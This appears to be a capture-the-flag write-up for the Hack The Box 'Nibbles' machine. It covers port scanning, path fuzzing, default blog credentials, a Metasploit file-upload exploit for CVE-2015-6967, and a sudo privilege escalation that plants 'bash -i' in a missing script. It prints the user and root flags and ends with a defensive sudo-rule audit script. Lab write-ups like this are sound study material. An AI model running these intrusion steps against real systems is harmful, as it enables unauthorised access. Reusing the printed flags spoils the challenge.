HTB:Nibbles[WriteUP]
Contents
Connect to the HTB server and start the target machine
1.How many open TCP ports are listening on Nibbles?
Scan the target's TCP ports for open services with nmap
2.What is the relative path on the webserver to a blog?
Fuzz the web paths on the target's port 80 with ffuf
3.What content management system (CMS) is being used by the blog?
Open /nibbleblog in the browser
4.What is the relative path to an XML file that contains the admin username?
Recursively scan the paths under /nibbleblog on the target with feroxbuster
5.What is the admin user's password to log into the blog?
6.What version of nibble blog is running on the target machine? Do not include the "v".
7.What is the 2015 CVE ID for an authenticated code execution by file upload vulnerability in this version of NibbleBlog.
Search for vulnerabilities affecting this NibbleBlog version with searchsploit
8.Which user the Nibbleblog instance is running on the target machine?
9.Submit the flag located in the nibbler user's home directory.
USER_FLAG:74926960e8914c5566003d8978b366d4
10.What is the name of the script that nibbler can run as root on Nibbles?
11.Enter the permission set on monitor.sh? Use the Linux file permissions format, like -rw-rw-r--.
Create two new directories on the target
12.Submit the flag located in root's home directory.
ROOT_FLAG:273ce39224dcf6ea02f2bc507a3e7c20
Connect to the HTB server and start the target machine
Target IP: 10.10.10.75
Assigned IP: 10.10.14.12
1.How many open TCP ports are listening on Nibbles?
Scan the target's TCP ports for open services with nmap
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.75
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.75
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-07 00:58 EST
Nmap scan report for 10.10.10.75 (10.10.10.75)
Host is up (0.065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 44.96 seconds
The scan shows that the target has 2 open TCP ports: 22 and 80.
2.What is the relative path on the webserver to a blog?
Fuzz the web paths on the target's port 80 with ffuf
The file index.html is visible; open it directly in the browser and press Ctrl+U to view the page source.
Blog path found: /nibbleblog
3.What content management system (CMS) is being used by the blog?
Open /nibbleblog in the browser
The page shows that the CMS in use is: Nibbles
4.What is the relative path to an XML file that contains the admin username?
Recursively scan the paths under /nibbleblog on the target with feroxbuster
feroxbuster --url http://10.10.10.75/nibbleblog/ -s 200,301,302 -W 0 -w ../dictionary/common.txt -t 200
In the terminal, press Ctrl+Shift+F to search the output for XML files
Open the file in the browser (/nibbleblog/content/private/users.xml); the username is visible: admin
5.What is the admin user's password to log into the blog?
Because the feroxbuster output is too noisy, run a simpler scan of the /nibbleblog directory with ffuf
Open admin.php in the browser
The default credentials can be found directly on Google
Account: admin
Password: nibbles
6.What version of nibble blog is running on the target machine? Do not include the "v".
Open the README file found in the earlier scan
Nibbles version obtained: 4.0.3
7.What is the 2015 CVE ID for an authenticated code execution by file upload vulnerability in this version of NibbleBlog.
Search for vulnerabilities affecting this NibbleBlog version with searchsploit
searchsploit Nibbleblog
Copy the .rb file into the current directory
searchsploit -m 38489.rb
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 38489.rb
Exploit: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)
URL: https://www.exploit-db.com/exploits/38489
Path: /usr/share/exploitdb/exploits/php/remote/38489.rb
Codes: CVE-2015-6967, OSVDB-127059
Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/kali/Desktop/temp/38489.rb
The description shows that this exploit is based on the vulnerability CVE-2015-6967
8.Which user the Nibbleblog instance is running on the target machine?
This module is included in MSF; start Metasploit
msfconsole
Search for nibbleblog exploit modules
search nibbleblog
Configure the other options as usual; the target URI is set with:
set TARGETURI /nibbleblog
Run the getuid command; the output shows that the current user is: nibbler
9.Submit the flag located in the nibbler user's home directory.
Drop into a shell
shell
Locate user_flag and view its contents
find / -name 'user.txt' 2>/dev/null
/home/nibbler/user.txt
cat /home/nibbler/user.txt
74926960e8914c5566003d8978b366d4
USER_FLAG:74926960e8914c5566003d8978b366d4
10.What is the name of the script that nibbler can run as root on Nibbles?
Check which commands the current user may run with elevated privileges
sudo -l
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
The output shows that the current user can run this file with root privileges: monitor.sh
11.Enter the permission set on monitor.sh? Use the Linux file permissions format, like -rw-rw-r--.
Running cat on the file directly, it surprisingly reports that the file does not exist
Since the file does not exist for this question, let alone its permissions being viewable, this question is simply skipped
cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
Enter the /home/nibbler directory; it turns out that not even the personal directory exists
cd /home/nibbler
ls
personal.zip
user.txt
ls -a
.
..
.bash_history
.nano
personal.zip
user.txt
That makes it easy: we just create this file ourselves and get a shell directly
Create two new directories on the target
mkdir personal
cd personal
mkdir stuff
cd stuff
Create the monitor.sh file
nibbler@Nibbles:/home/nibbler/personal/stuff$ touch monitor.sh
touch monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'bash -i' > monitor.sh
echo 'bash -i' > monitor.sh
Run the file directly
sudo /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# whoami
whoami
root
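The escalation above works only because the sudoers rule names /home/nibbler/personal/stuff/monitor.sh, a path that does not exist and sits under a directory nibbler owns, so nibbler can supply the script that root executes. As an added example that is not part of this writeup, the POSIX shell script below audits such a rule from the defender's side: it takes one rule line in the format printed by sudo -l, extracts the command path, and reports whether the target is missing, or whether the target or any parent directory is owned by the rule's user or is group/world writable. The function names sudo_rule_cmd and sudo_rule_risk are my own, and the sample rule line is the one shown in the sudo -l output above.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit the command path of a sudo rule
# for the weakness used above. A NOPASSWD rule is only as strong as the file it
# names: if the target is missing, or the target or any parent directory is owned
# by the rule's user (or is group/world writable), that user can supply their own
# script and run it as root. Needs only POSIX sh, ls, awk, cut and sed.

# Extract the command path from one "sudo -l" rule line, e.g.
#   (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
# Tags before the path (NOPASSWD:, SETENV:, ...) are skipped; arguments after
# the path are dropped.
sudo_rule_cmd() {
    printf '%s\n' "$1" |
        sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\([A-Z]*:[[:space:]]*\)*\(\/[^ ,]*\).*/\2/p'
}

# Report findings for command path $1 when the rule applies to user $2.
# Prints a comma-separated list of findings, or "ok" when none apply.
sudo_rule_risk() {
    path="$1"; user="$2"; findings=""
    if [ -e "$path" ]; then
        node="$path"                # start with the script itself
    else
        findings="missing-target"   # the user can create it, as on Nibbles
        node=$(dirname "$path")
    fi
    # Walk from the deepest existing component up to / and inspect each one.
    while :; do
        if [ -e "$node" ]; then
            line=$(ls -ldL "$node")             # -L: judge the real file, not a symlink
            owner=$(printf '%s\n' "$line" | awk '{print $3}')
            perms=$(printf '%s\n' "$line" | cut -c1-10)
            if [ "$owner" = "$user" ]; then
                findings="${findings:+$findings,}user-owned:$node"
            fi
            case "$perms" in
                ?????w????) findings="${findings:+$findings,}group-writable:$node" ;;
            esac
            case "$perms" in
                ????????w?) findings="${findings:+$findings,}world-writable:$node" ;;
            esac
        fi
        if [ "$node" = "/" ]; then
            break
        fi
        node=$(dirname "$node")
    done
    printf '%s\n' "${findings:-ok}"
}

# Constructed sample: the rule seen in the writeup, audited for user nibbler.
rule="(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
cmd=$(sudo_rule_cmd "$rule")
echo "$cmd -> $(sudo_rule_risk "$cmd" nibbler)"
```

Run it as root against each rule line from sudo -l -U <user>; any finding other than "ok" means the rule should point at a root-owned script in a root-owned directory (for example under /usr/local/sbin), not at a path the unprivileged user controls. The same walk up the directory tree is what makes the check catch a writable parent directory, which is just as exploitable as a writable script.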
12.Submit the flag located in root's home directory.
Locate root_flag and view its contents
root@Nibbles:/home/nibbler/personal/stuff# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
cat /root/root.txt
273ce39224dcf6ea02f2bc507a3e7c20